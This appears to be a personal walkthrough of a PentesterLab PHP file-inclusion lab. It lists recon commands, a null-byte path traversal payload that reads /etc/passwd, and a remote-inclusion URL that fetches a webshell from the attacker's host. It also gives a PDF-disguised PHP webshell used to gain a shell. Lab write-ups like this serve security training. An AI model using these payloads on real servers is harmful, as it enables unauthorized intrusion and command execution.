pentesterlab-PHP-include

Tools:

netdiscover
Nmap
Nikto
Wfuzz
Netcat

Use netdiscover to detect target IP address

netdiscover -i eth0 -r 192.168.79.0/24

[title manually exploit [alt text]]

192.168.79.188 is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 192.168.79.184 -p-

[title manually exploit [alt text]]

Only port 80 is opening.

Use Wfuzz to scan

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 http://192.168.79.188/FUZZ 2>/dev/null

[title manually exploit [alt text]]

use nikto to scan

nikto -h 192.168.79.188

looks like there is a php include vulnerability

[title manually exploit [alt text]]

Lets confirm it:

http://192.168.79.188/index.php?page=fgfgfgf

[title manually exploit [alt text]]

http://192.168.79.188/index.php?page=../../../../../../../../../../etc/passwd%00

(the reason why add %00 after /etc/passwd is php code will ad a suffix .php, so that we have to add a Null byte to get rid of it)

[title manually exploit [alt text]]

I tried to exploit remote file inclide:

http://192.168.79.188/index.php?page=http://192.168.79.173/webshell.txt&cmd=ifconfig

Doesn’t work.

Exam the webpage, I find that I can upload pdf file to the server. I tried just rename webshell.txt to webshell.pdf and the server doesn’t accpet it. I guess the server will valid the pdf file format. So I create a craft pdf file:

webshell.pdf

%PDF-1.4
<?php
  system($_GET["cmd"]);
?>

Upload it. Works.

[title manually exploit [alt text]]

Now try to visit after log in.

Try to verify the webshell:

[title manually exploit [alt text]]

looks good

set up netcat listener on my kali and run the command on server:

[title manually exploit [alt text]]

and get the shell:

[title manually exploit [alt text]]

DONE

Bob1Bob2

Pen Test Notes

pentesterlab-PHP-include

Tools: